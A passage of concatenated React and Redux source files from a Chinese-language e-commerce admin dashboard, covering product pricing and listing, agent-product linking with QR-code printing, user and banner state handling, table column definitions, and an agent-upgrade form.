<a onClick={() => this.printProduct(record)} href="javascript:;">打印</a>
</div>
)
}
},
];
}
state = {
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
selectedRowKeys: [],
selectedRows: [],
loading: false,
visible: false,
confirmLoading: false,
printList: [],
codeList: [],
productCategory: [],
productSubcategory: [],
showProductModal: false,
dictLevel4: [],
colour: [],
};
async componentDidMount() {
this.getProductList();
const productCategory = getProductTypes({ parentLabel: 'productCategory' });
this.setState({ productCategory: await productCategory });
const dictLevel4 = getProductTypes({ level: 4 });
this.setState({ dictLevel4: await dictLevel4 });
const colour = getSystemDicts({ parentLabel: 'colour' });
this.setState({ colour: await colour });
}
componentWillUnmount() {
this.setState = (state,callback) => { };
}
getProductList = async (params) => {
const { match } = this.props;
const { id } = match.params;
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
await this.props.getProductList({ ...values, ...params, agentId: id, exist: 1, limit: 10 });
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
handleCateChange = async (value) => {
this.props.form.setFieldsValue({ productSubcategory: [] });
if (value) {
const result = await getProductTypes({ parentLabel: value });
this.setState({ productSubcategory: result });
}
}
handleSubmit = (e) => {
e.preventDefault();
this.getProductList();
}
onSelectChange = (selectedRowKeys, selectedRows) => {
const { selectedRows: productList } = this.state;
let newRows = [];
if (selectedRowKeys.length === selectedRows.length) {
newRows = [...selectedRows];
} else if (selectedRowKeys.length > selectedRows.length) {
const otherRowsKeys = selectedRowKeys.filter(item => selectedRows.every(row => row.id !== item));
const otherRows = productList.filter(item => otherRowsKeys.indexOf(item.id) !== -1);
newRows = otherRows.concat(selectedRows);
}
this.setState({ selectedRows: newRows, selectedRowKeys });
}
handleReset = () => {
this.props.form.resetFields();
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getProductList({
limit: pagination.pageSize,
page: pagination.current,
});
}
handleShowModal = () => {
this.setState({ showProductModal: true });
}
handleCloseModal = () => {
this.setState({ showProductModal: false });
this.getProductList();
}
title = () => {
const { selectedRowKeys, selectedRows } = this.state;
return (
<div>
<span>操作处理:</span>
<Button disabled={!selectedRowKeys.length} onClick={this.printProduct} type="primary">批量打印</Button>
<Divider type="vertical" />
<Button disabled={!selectedRowKeys.length} onClick={() => this.agentProduct(0)} type="primary">取消关联</Button>
<Divider type="vertical" />
<Button onClick={this.handleShowModal} type="primary">关联产品</Button>
</div>
)
}
agentProduct = async(sign) => {
const agentId = this.props.match.params.id;
const { selectedRowKeys, selectedRows } = this.state;
const values = selectedRowKeys.map(item => item);
const result = await deleteAgentProduct(agentId, values);
if (result && result.code === 0) {
message.success(`产品名称为${selectedRows.map(item => item.name).join('、')}关联代理商成功`);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('批量关联代理商失败,请稍后重试');
}
}
agentProductSingle = async (record) => {
const agentId = this.props.match.params.id;
const result = await deleteAgentProduct(agentId, [record.id]);
if (result && result.code === 0) {
message.success(`产品名称为${record.name}关联代理商成功`);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('代理商关联此产品失败,请稍后重试');
}
}
showModal = () => {
this.setState({
visible: true,
});
}
handleOk = () => {
this.setState({
confirmLoading: true,
});
}
handleCancel = () => {
this.setState({
visible: false,
});
}
printProduct = async (record) => {
const { sn } = qs.parse(this.props.location.search.substr(1));
if (record.id) {
const result = await getProductCode(record.id, sn);
const code = result.data || '';
this.setState({ printList: [record], codeList: [code] }, () => {
this.showModal();
});
} else {
const { selectedRows, selectedRowKeys } = this.state;
const promises = selectedRowKeys.map((id) => getProductCode(id, sn));
const results = await Promise.all(promises);
const codeList = results.map(item => item ? item.data: '');
this.setState({ printList: selectedRows, codeList }, () => {
this.showModal();
});
}
}
render() {
const { form: { getFieldDecorator }, productList = {} } = this.props;
const { selectedRowKeys, loading, visible, confirmLoading, printList, codeList, productCategory = [], productSubcategory, showProductModal } = this.state;
const rowSelection = { selectedRowKeys, onChange: this.onSelectChange };
const agentId = this.props.match.params.id;
return (
<div className="page-list product-list">
<ProductModal agentId={agentId} showProductModal={showProductModal} handleCloseModal={this.handleCloseModal}/>
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品名称">
{getFieldDecorator('name')(
<Input placeholder="请输入产品名称" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品货号">
{getFieldDecorator('sameStyleNum')(
<Input placeholder="请输入产品货号" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品大类">
{getFieldDecorator('productCategory')(
<Select onChange={this.handleCateChange} allowClear placeholder="请选择产品大类">
{productCategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品子类">
{getFieldDecorator('productSubcategory')(
<Select allowClear placeholder="请选择产品子类">
{productSubcategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button style={{ marginLeft: '8px', marginRight: '8px' }} onClick={this.handleReset}>清空</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
title={this.title}
rowKey="id"
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: productList.total, ...this.state.pagination }}
rowSelection={rowSelection}
columns={this.columns}
dataSource={productList.records}
loading={loading}
/>
</Card>
<Modal title="产品二维码"
className="print-modal"
width="230mm"
visible={visible}
onOk={this.handleOk}
confirmLoading={confirmLoading}
onCancel={this.handleCancel}
style={{ padding: 0 }}
footer={null}
>
<div className="print-wrap" style={{ width: '230mm', padding: '6mm 0' }} ref={el => (this.componentRef = el)}>
<Row>
{printList.map((item, key) => (
<Col key={item.id} style={{ marginBottom: '10mm' }} span={selectedRowKeys.length > 1 ? 6 : 24}>
<img alt="二维码" src={codeList[key]} />
<img alt="产品图片" src={item.mainPicture} />
</Col>
))}
</Row>
</div>
<div style={{ textAlign: 'center' }}>
<Button onClick={this.handleCancel} style={{ marginRight: '20px' }}>取消</Button>
<ReactToPrint
trigger={() => <Button type="primary">打印</Button>}
content={() => this.componentRef}
/>
</div>
</Modal>
</div>
)
}
}
<file_sep>import { GET_USER_LIST, GET_USER_BYID, GET_USER_ADDRESS_BYID, GET_USER_ORDER_BYID, GET_USER_LOGIN_LOGS } from '../action/user';
const defaultState = {
userList: {},
userDetail: {},
userAddress: {},
userLoginLogs: {},
}
export default function user(state = defaultState, action) {
switch (action.type) {
case GET_USER_LIST:
return {
...state,
userList: action.data
}
case GET_USER_BYID:
return {
...state,
userDetail: action.data
}
case GET_USER_ADDRESS_BYID:
return {
...state,
userAddress: action.data
}
case GET_USER_ORDER_BYID:
return {
...state,
userOrderList: action.data
}
case GET_USER_LOGIN_LOGS:
return {
...state,
userLoginLogs: action.data
}
default:
return state
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router-dom';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button, Divider, message, Modal, Popconfirm } from 'antd';
import PriceForm from './PriceForm';
import { getProductList, addBatch, batchUpProduct, batchDownProduct, updateProduct } from '../../action/product';
import { getSystemDicts } from '../../action/system';
import { getProductTypes } from '../../action/productType';
import { formatDateSecond, formatYuan, fixedNumber } from '../../utils/utils';
import { formItemLayout, showTotal, nullString, PRODUCT_STATUS, UNIT_VALUES } from '../../utils/constant';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ product }) => ({
productList: product.productList
}), {
getProductList,
})
@Form.create()
export default class ProductList extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
{
title: '产品名称',
dataIndex: 'name',
key: 'name',
align: 'center',
fixed: 'left',
},
{
title: '产品货号',
dataIndex: 'sameStyleNum',
key: 'sameStyleNum',
align: 'center',
},
{
title: '产品大类',
dataIndex: 'productCategory',
key: 'productCategory',
align: 'center',
render: (text) => {
const info = this.state.productCategory.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品子类',
dataIndex: 'productSubcategory',
key: 'productSubcategory',
align: 'center',
render: (text) => {
const info = this.state.dictLevel4.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品图片',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
},
{
title: '价格(元)',
dataIndex: 'productPrice',
key: 'productPrice',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return product.price !== undefined ? formatYuan(product['price']) : nullString
}
},
{
title: '计价单位',
dataIndex: 'unit',
key: 'unit',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return UNIT_VALUES[product['unit']] || nullString
}
},
{
title: '颜色',
dataIndex: 'colour',
key: 'colour',
align: 'center',
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
width: '14%',
render: (text) => text ? formatDateSecond(text) : nullString
},
{
title: '状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => text ? PRODUCT_STATUS[text] : '待上架'
},
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
fixed: 'right',
render: (text, record) => {
return (
<div>
<Link to={`/product/detail/${record.id}`}>查看</Link>
<Divider type="vertical" />
<Link to={`/product/edit/${record.id}`}>编辑</Link>
<Divider type="vertical" />
{record.priceList.length ? (
<Popconfirm
placement="topLeft"
title={`请确定是否${record.status === '1' ? '下架' : '上架'}该产品?`}
onConfirm={() => this.updateProductStatus(record)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">{record.status === '1' ? '下架' : '上架'}</a>
</Popconfirm>
) : (
<Popconfirm
placement="topLeft"
title={`请确定是否定价该产品?`}
onConfirm={() => this.singlePrice(record)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">定价</a>
</Popconfirm>
)}
</div>
)
}
},
];
}
state = {
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
selectedRowKeys: [],
selectedRows: [],
loading: false,
visible: false,
confirmLoading: false,
batchList: [],
productCategory: [],
productSubcategory: [],
dictLevel4: [],
colour: [],
};
async componentDidMount() {
this.getProductList();
const productCategory = getProductTypes({ parentLabel: 'productCategory' });
this.setState({ productCategory: await productCategory });
const dictLevel4 = getProductTypes({ level: 4 });
this.setState({ dictLevel4: await dictLevel4 });
const colour = getSystemDicts({ parentLabel: 'colour' });
this.setState({ colour: await colour });
}
componentWillUnmount() {
this.setState = (state, callback) => { };
}
getProductList = async (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getProductList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
updateProductStatus = async ({ id, status, name }) => {
let nextStatus = '1';
let info = '上架';
if (status === '1') {
nextStatus = '2';
info = '下架';
}
const result = await updateProduct({
id,
status: nextStatus,
});
if (result && result.code === 0) {
message.success(`产品名称为${name}的产品${info}成功`);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
} else {
message.error('产品状态变更失败,请稍后重试');
}
}
singlePrice = (record) => {
this.setState({
batchList: [record],
});
this.showModal();
}
batchPrice = () => {
const { selectedRows } = this.state;
this.setState({
batchList: selectedRows,
});
this.showModal();
}
handleSubmit = (e) => {
e.preventDefault();
this.getProductList();
}
onSelectChange = (selectedRowKeys, selectedRows) => {
const { selectedRows: productList } = this.state;
let newRows = [];
if (selectedRowKeys.length === selectedRows.length) {
newRows = [...selectedRows];
} else if (selectedRowKeys.length > selectedRows.length) {
const otherRowsKeys = selectedRowKeys.filter(item => selectedRows.every(row => row.id !== item));
const otherRows = productList.filter(item => otherRowsKeys.indexOf(item.id) !== -1);
newRows = otherRows.concat(selectedRows);
}
this.setState({ selectedRows: newRows, selectedRowKeys });
}
handleReset = () => {
this.props.form.resetFields();
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getProductList({
limit: pagination.pageSize,
page: pagination.current,
});
}
showModal = () => {
this.setState({ visible: true });
}
handleOk = () => {
this.setState({ confirmLoading: true });
}
handleCancel = () => {
this.setState({ visible: false });
}
title = () => {
const { selectedRowKeys } = this.state;
return (
<div>
<span>操作处理:</span>
<Button disabled={!selectedRowKeys.length} onClick={this.batchPrice} type="primary">批量定价</Button>
<Divider type="vertical" />
<Button disabled={!selectedRowKeys.length} onClick={this.batchUpProduct} type="primary">批量上架</Button>
<Divider type="vertical" />
<Button disabled={!selectedRowKeys.length} onClick={this.batchDownProduct} type="primary">批量下架</Button>
</div>
)
}
addBatch = async(params) => {
const { batchList } = this.state;
let values = [];
batchList.forEach(item => {
values.push({
productId: item.id,
interval: `${params.num1}-${params.num2}`,
price: fixedNumber(params.price1 * 100),
unit: params.unit,
});
values.push({
productId: item.id,
interval: `${params.num3}-${params.num4}`,
price: fixedNumber(params.price2 * 100),
unit: params.unit,
});
values.push({
productId: item.id,
interval: `${params.num5}-${params.num6}`,
price: fixedNumber(params.price3 * 100),
unit: params.unit,
});
});
const result = await addBatch(values);
if (result && result.code === 0) {
this.handleCancel();
const nameStr = batchList.map(item => item.name).join('、');
const messageInfo = (
<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{nameStr}</span>定价成功</p>
);
message.success(messageInfo);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('批量定价失败,请稍后重试');
}
}
batchUpProduct = async() => {
const { selectedRows, selectedRowKeys } = this.state;
const noPriceNameList = [];
selectedRows.forEach(item => {
if (!item.priceList.length) {
noPriceNameList.push(item.name);
}
});
if (noPriceNameList.length) {
message.error(<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{noPriceNameList.join('、')}</span>还未定价,不能上架</p>)
return false;
}
const result = await batchUpProduct(selectedRowKeys);
if (result && result.code === 0) {
const nameStr = selectedRows.map(item => item.name).join('、');
const messageInfo = (
<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{nameStr}</span>上架成功</p>
);
message.success(messageInfo);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('批量上架失败,请稍后重试');
}
}
batchDownProduct = async() => {
const { selectedRows, selectedRowKeys } = this.state;
const noPriceNameList = [];
selectedRows.forEach(item => {
if (!item.priceList.length) {
noPriceNameList.push(item.name);
}
});
if (noPriceNameList.length) {
message.error(<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{noPriceNameList.join('、')}</span>还未定价,不能下架</p>)
return false;
}
const result = await batchDownProduct(selectedRowKeys);
if (result && result.code === 0) {
const nameStr = selectedRows.map(item => item.name).join('、');
const messageInfo = (
<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{nameStr}</span>下架成功</p>
);
message.success(messageInfo);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('批量下架失败,请稍后重试');
}
}
handleCateChange = async (value) => {
this.props.form.setFieldsValue({ productSubcategory: undefined });
if (value) {
const result = await getProductTypes({ parentLabel: value });
this.setState({ productSubcategory: result });
}
}
render() {
const { form: { getFieldDecorator }, productList = {} } = this.props;
const { selectedRowKeys, loading, visible, confirmLoading, productCategory, productSubcategory } = this.state;
const rowSelection = { selectedRowKeys, onChange: this.onSelectChange };
return (
<div className="page-list product-list">
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="产品名称">
{getFieldDecorator('name')(
<Input placeholder="请输入产品名称" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="产品货号">
{getFieldDecorator('sameStyleNum')(
<Input placeholder="请输入产品货号" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="产品大类">
{getFieldDecorator('productCategory')(
<Select onChange={this.handleCateChange} allowClear placeholder="请选择产品大类">
{productCategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="产品子类">
{getFieldDecorator('productSubcategory')(
<Select allowClear placeholder="请选择产品子类">
{productSubcategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="产品状态">
{getFieldDecorator('status')(
<Select allowClear placeholder="请选择产品状态">
{Object.keys(PRODUCT_STATUS).map(item => (
<Option key={item} value={item}>{PRODUCT_STATUS[item]}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="是否定价">
{getFieldDecorator('isHasPrice')(
<Select allowClear placeholder="请选择定价状态">
<Option value={0}>未定价</Option>
<Option value={1}>已定价</Option>
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="创建起止时间">
{getFieldDecorator('createTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button style={{ marginLeft: '8px', marginRight: '8px' }} onClick={this.handleReset}>清空</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
title={this.title}
rowKey="id"
scroll={{ x: 1200 }}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: productList.total, ...this.state.pagination }}
rowSelection={rowSelection}
columns={this.columns}
dataSource={productList.records}
loading={loading}
/>
</Card>
<Modal title="产品批量定价"
visible={visible}
onOk={this.handleOk}
confirmLoading={confirmLoading}
onCancel={this.handleCancel}
footer={null}
>
<PriceForm handleCancel={this.handleCancel} addBatch={this.addBatch} />
</Modal>
</div>
)
}
}
<file_sep>import API from '../utils/api';
import { get, post, put, deleted } from '../utils/request';
export const GET_SKYLIGHT_LIST = 'GET_SKYLIGHT_LIST';
export const GET_SKYLIGHT_BYID = 'GET_SKYLIGHT_BYID';
export function getSkylightList(params) {
return async (dispatch) => {
const result = await get(API.getSkylightList, params);
if (result && result.status === 200) {
dispatch({
type: GET_SKYLIGHT_LIST,
data: result.data
});
}
}
}
export function getSkylightById(id) {
return async (dispatch) => {
const result = await get(`${API.getSkylightById}/${id}`);
if (result && result.status === 200) {
dispatch({
type: GET_SKYLIGHT_BYID,
data: result.data.data
})
}
}
}
export async function addSkylight(params) {
const result = await post(API.addSkylight, params);
if (result && result.status === 200) {
return result.data
}
}
export async function updateSkylight(params) {
const result = await put(API.updateSkylight, params);
if (result && result.status === 200) {
return result.data
}
}
export async function deleteSkylight(id) {
const result = await deleted(`${API.deleteSkylight}/${id}`);
if (result && result.status === 200) {
return result.data
}
}
<file_sep>import { formatDateMinute } from '../../../utils/utils';
import { nullString } from '../../../utils/constant';
const columns = [
{
title: '订单编号',
dataIndex: 'expressTrackingNo',
key: 'expressTrackingNo',
align: 'center',
},
{
title: '提交时间',
dataIndex: 'createdTime',
key: 'createdTime',
align: 'center',
render: (text) => text ? formatDateMinute(text) : nullString
},
{
title: '用户账号',
dataIndex: 'accountId',
key: 'accountId',
align: 'center',
},
{
title: '订单金额(元)',
dataIndex: 'orderAmountPayment',
key: 'orderAmountPayment',
align: 'center',
},
{
title: '代理商',
dataIndex: 'agentId',
key: 'agentId',
align: 'center',
},
{
title: '返点金额(元)',
dataIndex: 'rebateTotal',
key: 'rebateTotal',
align: 'center',
},
{
title: '支付方式',
dataIndex: 'paymentMethod',
key: 'paymentMethod',
align: 'center',
},
{
title: '订单来源',
dataIndex: 'paymentChannel',
key: 'paymentChannel',
align: 'center',
},
{
title: '订单状态',
dataIndex: 'status',
key: 'status',
align: 'center',
},
];
export default columns;
<file_sep>import { ORDER_STATUS } from '../../../utils/constant';
import { formatDateSecond } from '../../../utils/utils';
const paymentStatus = ['支付成功', '支付失败'];
const columns = [
{
title: '快递公司',
dataIndex: 'expressCompanyName',
key: 'expressCompanyName',
align: 'center',
},
{
title: '操作时间',
dataIndex: 'shippingTime',
key: 'shippingTime',
align: 'center',
render: text => text && formatDateSecond(text)
},
{
title: '订单状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: text => ORDER_STATUS[text] || '未支付'
},
{
title: '支付状态',
dataIndex: 'paymentStatus',
key: 'paymentStatus',
align: 'center',
render: text => paymentStatus[text],
},
{
title: '发货状态',
dataIndex: 'expressTrackingNo',
key: 'expressTrackingNo',
align: 'center',
render: text => text ? '已发货' : '未发货',
},
{
title: '备注',
dataIndex: 'quantity',
key: 'quantity',
align: 'center',
}
];
export default columns;
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button } from 'antd';
import { getSystemLogList } from '../../action/system';
import listColumns from './columns/list';
import { formItemLayout, showTotal } from '../../utils/constant';
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ system }) => ({
systemLogList: system.systemLogList
}), {
getSystemLogList,
})
@Form.create()
export default class OperateLog extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
...listColumns,
];
}
state = {
selectedRowKeys: [],
loading: false,
};
componentDidMount() {
this.props.getSystemLogList();
}
getSystemLogList = (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getSystemLogList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
handleSubmit = (e) => {
e.preventDefault();
this.getSystemLogList();
}
onSelectChange = (selectedRowKeys) => {
this.setState({ selectedRowKeys });
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getSystemLogList({
limit: pagination.pageSize,
page: pagination.current,
});
}
render() {
const { form: { getFieldDecorator }, systemLogList = {} } = this.props;
const { selectedRowKeys, loading } = this.state;
const rowSelection = { selectedRowKeys, ...this.rowSelection };
return (
<div className="page-list operateLog-list">
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="操作人">
{getFieldDecorator('createBy')(
<Input placeholder="请输入操作人" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="日志类型">
{getFieldDecorator('type')(
<Select allowClear placeholder="请选择日志类型">
<Option value="1">类别1</Option>
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="创建起止时间">
{getFieldDecorator('createTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button
style={{ marginLeft: '8px', marginRight: '8px' }}
onClick={this.handleReset}
>
清空
</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
rowKey="id"
rowSelection={rowSelection}
columns={this.columns}
dataSource={systemLogList.records}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: systemLogList.total, ...this.state.pagination }}
loading={loading}
/>
</Card>
</div>
)
}
}
<file_sep>import React from 'react';
import { formatDateSecond } from '../../../utils/utils';
const columns = [
{
title: '字典编码',
dataIndex: 'label',
key: 'label',
align: 'center',
},
{
title: '字典值',
dataIndex: 'value',
key: 'value',
align: 'center',
},
{
title: '字典名称',
dataIndex: 'description',
key: 'description',
align: 'center',
},
{
title: '层级',
dataIndex: 'level',
key: 'level',
align: 'center',
},
{
title: '上级编码',
dataIndex: 'parentLabel',
key: 'parentLabel',
align: 'center',
},
{
title: '顺序',
dataIndex: 'sort',
key: 'sort',
align: 'center',
},
{
title: '图片',
dataIndex: 'image',
key: 'image',
align: 'center',
render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
render: (text) => formatDateSecond(text)
},
{
title: '创建人',
dataIndex: 'creator',
key: 'creator',
align: 'center',
},
];
export default columns;
<file_sep>const columns = [
{
title: '货号',
dataIndex: 'productCategory',
key: 'productCategory',
align: 'center',
},
{
title: '图片',
dataIndex: 'age',
key: 'productSubcategory',
align: 'center',
},
{
title: '颜色',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
},
{
title: '成分',
dataIndex: 'name',
key: 'name',
align: 'center',
},
{
title: '克重',
dataIndex: 'productPrice',
key: 'productPrice',
align: 'center',
},
{
title: '门幅',
dataIndex: 'unit',
key: 'unit',
align: 'center',
},
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
},
];
export default columns;
<file_sep>import 'braft-editor/dist/index.css';
import React from 'react';
import { Link } from 'react-router-dom';
import { Card, Form, Input, Select, Button, message } from 'antd';
import BraftEditor from 'braft-editor'
import EnhanceTitle from '../../component/EnhanceTitle';
import Uploader from '../../component/Uploader';
import { upgradeUser } from '../../action/user';
import { formItemLayout2, formItemLayout4, AGENT_TYPE } from '../../utils/constant';
const FormItem = Form.Item;
const Option = Select.Option;
@Form.create()
export default class UserUpgrade extends React.PureComponent {
componentWillUnmount() {
this.timer = null;
}
timer = null;
handleSubmit= (e) => {
e.preventDefault();
this.props.form.validateFields(async (err, values) => {
if (!err) {
const { id } = this.props.match.params;
const { detail, mainPicture, ...params } = values;
const newDetail = values.detail.toRAW();
const url = mainPicture && mainPicture[0];
const result = await upgradeUser({ ...params, accountId: id, url });
if (result && result.code === 0) {
message.success('升级代理商成功!将会返回用户列表页面');
this.timer = setTimeout(() => {
this.props.history.push('/user/list');
});
} else {
message.error('升级代理商失败!请稍后重试');
}
}
});
}
handleReset = () => {
this.props.form.resetFields();
this.props.form.setFieldsValue({ detail: BraftEditor.createEditorState(null) });
}
render() {
const { getFieldDecorator } = this.props.form;
const controls = ['bold', 'italic', 'underline', 'text-color', 'separator', 'link', 'separator', 'media' ]
return (
<div className="page-detail">
<Form onSubmit={this.handleSubmit}>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<FormItem {...formItemLayout2} label="代理商类型">
{getFieldDecorator('type', {
rules: [{
required: true, message: '请选择代理商类型',
}],
})(
<Select allowClear placeholder="请选择代理商类型">
{Object.keys(AGENT_TYPE).map(item => (
<Option key={item} value={item}>{AGENT_TYPE[item]}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="代理商编号">
{getFieldDecorator('TODO1')(
<Input placeholder="请输入代理商编号" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="代理商名称">
{getFieldDecorator('name', {
rules: [{
required: true, message: '请输入代理商名称',
}],
})(
<Input placeholder="请输入代理商名称" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="代理商账号">
{getFieldDecorator('phoneNumber', {
rules: [{
required: true, message: '请输入代理商账号',
}],
})(
<Input placeholder="请输入代理商账号" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="返点率">
{getFieldDecorator('diPer', {
rules: [{
required: true, message: '请输入返点率',
}],
})(
<Input addonAfter="%" placeholder="请输入返点率" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="门店图片">
{getFieldDecorator('mainPicture', {
rules: [{
required: true, message: '请添加门店图片',
}],
})(
<Uploader max={1}/>
)}
</FormItem>
